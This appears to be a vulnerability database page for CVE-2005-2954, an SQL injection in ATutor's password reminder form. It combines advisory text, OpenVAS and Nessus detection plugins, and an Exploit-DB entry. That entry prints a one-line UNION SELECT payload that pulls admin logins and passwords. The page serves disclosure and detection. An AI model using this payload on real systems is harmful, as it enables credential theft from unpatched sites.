ID CVE-2005-2954 Type cve Reporter cve@mitre.org Modified 2017-07-11T01:33:00
Description
SQL injection vulnerability in password_reminder.php in ATutor before 1.5.1 pl1 allows remote attackers to execute arbitrary SQL commands via the email field. As the OSVDB, OpenVAS and Nessus entries below note, the flaw is only present when the PHP magic_quotes_gpc option is off, and both scanner checks confirm it solely by matching a MySQL error string echoed in the response, so an unpatched install that suppresses PHP error output may not be flagged by them.
{"osvdb": [{"lastseen": "2017-04-28T13:20:16", "bulletinFamily": "software", "cvelist": ["CVE-2005-2954"], "edition": 1, "description": "## Vulnerability Description\nATutor contains a flaw that may allow an attacker to carry out an SQL injection attack. The issue is due to the password_reminder.php script not properly sanitizing user-supplied input to the 'email' field. This may allow an attacker to inject or manipulate SQL queries in the backend database.\n## Technical Description\nThis vulnerability is only present when the magic_quotes_gpc PHP option is 'off'.\n## Solution Description\nUpgrade to version 1.5.1.pl1 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## Short Description\nATutor contains a flaw that may allow an attacker to carry out an SQL injection attack. The issue is due to the password_reminder.php script not properly sanitizing user-supplied input to the 'email' field. This may allow an attacker to inject or manipulate SQL queries in the backend database.\n## References:\nVendor URL: http://www.atutor.ca/\n[Secunia Advisory ID:16813](https://secuniaresearch.flexerasoftware.com/advisories/16813/)\n[Related OSVDB ID: 19413](https://vulners.com/osvdb/OSVDB:19413)\n[Related OSVDB ID: 19412](https://vulners.com/osvdb/OSVDB:19412)\nOther Advisory URL: http://rgod.altervista.org/atutor151.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2005-09/0144.html\nISS X-Force ID: 22282\n[CVE-2005-2954](https://vulners.com/cve/CVE-2005-2954)\nBugtraq ID: 14831\n", "modified": "2005-09-14T13:14:56", "published": "2005-09-14T13:14:56", "href": "https://vulners.com/osvdb/OSVDB:19411", "id": "OSVDB:19411", "title": "ATutor password_reminder.php Email Field SQL Injection", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "openvas": [{"lastseen": "2020-05-12T15:08:23", "bulletinFamily": "scanner", "cvelist": 
["CVE-2005-2954"], "description": "The remote version of ATutor contains an input validation flaw in\n the ", "modified": "2020-05-08T00:00:00", "published": "2006-03-26T00:00:00", "id": "OPENVAS:136141256231019765", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231019765", "type": "openvas", "title": "ATutor password reminder SQL injection", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# ATutor password reminder SQL injection\n#\n# Authors:\n# Josh Zlatin-Amishav (josh at ramat dot cc)\n#\n# Copyright:\n# Copyright (C) 2005 Josh Zlatin-Amishav\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:atutor:atutor\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.19765\");\n script_version(\"2020-05-08T08:34:44+0000\");\n script_tag(name:\"last_modification\", value:\"2020-05-08 08:34:44 +0000 (Fri, 08 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2006-03-26 17:55:15 +0200 (Sun, 26 Mar 2006)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_cve_id(\"CVE-2005-2954\");\n script_bugtraq_id(14831);\n\n script_name(\"ATutor password reminder SQL injection\");\n\n script_category(ACT_ATTACK);\n script_family(\"Web application abuses\");\n script_copyright(\"Copyright (C) 2005 Josh Zlatin-Amishav\");\n script_dependencies(\"gb_atutor_detect.nasl\");\n script_mandatory_keys(\"atutor/detected\");\n script_require_ports(\"Services/www\", 80);\n\n script_xref(name:\"URL\", value:\"http://retrogod.altervista.org/atutor151.html\");\n\n script_tag(name:\"solution\", value:\"Upgrade to ATutor 1.5.1 pl1 or later.\");\n\n script_tag(name:\"summary\", value:\"The remote version of ATutor contains an input validation flaw in\n the 'password_reminder.php' script. 
This vulnerability occurs only when 'magic_quotes_gpc' is set to\n off in the 'php.ini' configuration file.\");\n\n script_tag(name:\"impact\", value:\"A malicious user can exploit this flaw to manipulate SQL queries and steal\n any user's password.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_active\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"misc_func.inc\");\n\nif (!port = get_app_port(cpe: CPE))\n exit(0);\n\nif (!dir = get_app_location(cpe: CPE, port: port))\n exit(0);\n\nif (dir == \"/\")\n dir = \"\";\n\nvtstrings = get_vt_strings();\npostdata = string( \"form_password_reminder=true&\", \"form_email=%27\", vtstrings[\"lowercase\"], \"&\", \"submit=Submit\" );\n\nurl = dir + \"/password_reminder.php\";\nhost = http_host_name( port:port );\n\nreq = string( \"POST \", url, \" HTTP/1.1\\r\\n\",\n \"Host: \", host, \"\\r\\n\",\n \"Content-Type: application/x-www-form-urlencoded\\r\\n\",\n \"Content-Length: \", strlen(postdata), \"\\r\\n\",\n \"\\r\\n\",\n postdata );\nres = http_keepalive_send_recv( port:port, data:req, bodyonly:TRUE );\n\nif( \"mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource\" >< res ) {\n report = http_report_vuln_url( port:port, url:url );\n security_message( port:port, data:report );\n exit( 0 );\n}\n\nexit( 0 );\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2016-02-03T03:11:35", "description": "ATutor 1.5.1 Password_Reminder.PHP SQL Injection Vulnerability. CVE-2005-2954. 
Webapps exploit for php platform", "published": "2005-09-14T00:00:00", "type": "exploitdb", "title": "ATutor 1.5.1 Password_Reminder.PHP SQL Injection Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2005-2954"], "modified": "2005-09-14T00:00:00", "id": "EDB-ID:26257", "href": "https://www.exploit-db.com/exploits/26257/", "sourceData": "source: http://www.securityfocus.com/bid/14831/info\r\n\r\nATutor is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query.\r\n\r\nSuccessful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation. \r\n\r\ngo to http://www.example.com/atutor/password_reminder.php\r\n\r\nand in the email field type:\r\n\r\n' UNION SELECT login, password, 'your_email@example.com' FROM AT_admins /* ", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/26257/"}], "nessus": [{"lastseen": "2021-01-20T09:25:07", "description": "The remote host is running ATutor, an open source, web-based, Learning\nContent Management System (LCMS) designed with accessibility and\nadaptability in mind. \n\nThe remote version of this software contains an input validation flaw\nin the 'password_reminder.php' script. This vulnerability occurs only\nwhen 'magic_quotes_gpc' is set to off in the 'php.ini' configuration\nfile. 
A malicious user can exploit this flaw to manipulate SQL\nqueries and steal any user's password.", "edition": 19, "published": "2005-09-20T00:00:00", "title": "ATutor Password Reminder SQL Injection", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-2954"], "modified": "2005-09-20T00:00:00", "cpe": [], "id": "ATUTOR_PASSWORD_REMINDER_SQL.NASL", "href": "https://www.tenable.com/plugins/nessus/19765", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# Josh Zlatin-Amishav (josh at ramat dot cc)\n# GPLv2\n#\n\n\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description) {\n script_id(19765);\n script_version(\"1.22\");\n\n script_cve_id(\"CVE-2005-2954\");\n script_bugtraq_id(14831);\n\n name[\"english\"] = \"ATutor Password Reminder SQL Injection\";\n script_name(english:name[\"english\"]);\n \n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host contains a PHP script vulnerable to a SQL injection\nattack.\" );\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running ATutor, an open source, web-based, Learning\nContent Management System (LCMS) designed with accessibility and\nadaptability in mind. \n\nThe remote version of this software contains an input validation flaw\nin the 'password_reminder.php' script. This vulnerability occurs only\nwhen 'magic_quotes_gpc' is set to off in the 'php.ini' configuration\nfile. 
A malicious user can exploit this flaw to manipulate SQL\nqueries and steal any user's password.\" );\n # https://web.archive.org/web/20060524132340/http://retrogod.altervista.org/atutor151.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?173b81e7\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to ATutor 1.5.1 pl1 or later.\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:U/RC:ND\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2005/09/20\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2005/09/14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\nscript_set_attribute(attribute:\"plugin_type\", value:\"remote\");\nscript_end_attributes();\n\n \n summary[\"english\"] = \"Checks for SQL injection in password_reminder.php\";\n script_summary(english:summary[\"english\"]);\n \n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"(C) 2005-2021 Josh Zlatin-Amishav\");\n\n script_require_ports(\"Services/www\", 80);\n script_dependencies(\"http_version.nasl\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_keys(\"www/PHP\");\n exit(0);\n}\n\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"url_func.inc\");\n\nport = get_http_port(default:80, embedded:TRUE);\nif (!get_port_state(port)) exit(0);\nif (!can_host_php(port:port)) exit(0);\n \npostdata = string(\n \"form_password_reminder=true&\",\n \"form_email=%27\", SCRIPT_NAME, \"&\",\n \"submit=Submit\"\n);\n\nforeach dir ( cgi_dirs() )\n{\n # Make sure the affected script exists.\n req = http_get(item:string(dir, 
\"/password_reminder.php\"), port:port);\n res = http_keepalive_send_recv(port:port, data:req, bodyonly:TRUE);\n if (res == NULL) exit(0);\n\n if (\n \"ATutor\" >< res &&\n '<input type=\"hidden\" name=\"form_password_reminder\"' >< res\n ) {\n req = string(\n \"POST \", dir, \"/password_reminder.php HTTP/1.1\\r\\n\",\n \"Host: \", get_host_name(), \"\\r\\n\",\n \"Content-Type: application/x-www-form-urlencoded\\r\\n\",\n \"Content-Length: \", strlen(postdata), \"\\r\\n\",\n \"\\r\\n\",\n postdata\n );\n res = http_keepalive_send_recv(port:port, data:req, bodyonly:TRUE);\n if (res == NULL) exit(0);\n\n if ( \"mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource\" >< res) {\n security_hole(port);\n set_kb_item(name: 'www/'+port+'/SQLInjection', value: TRUE);\n exit(0);\n }\n }\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}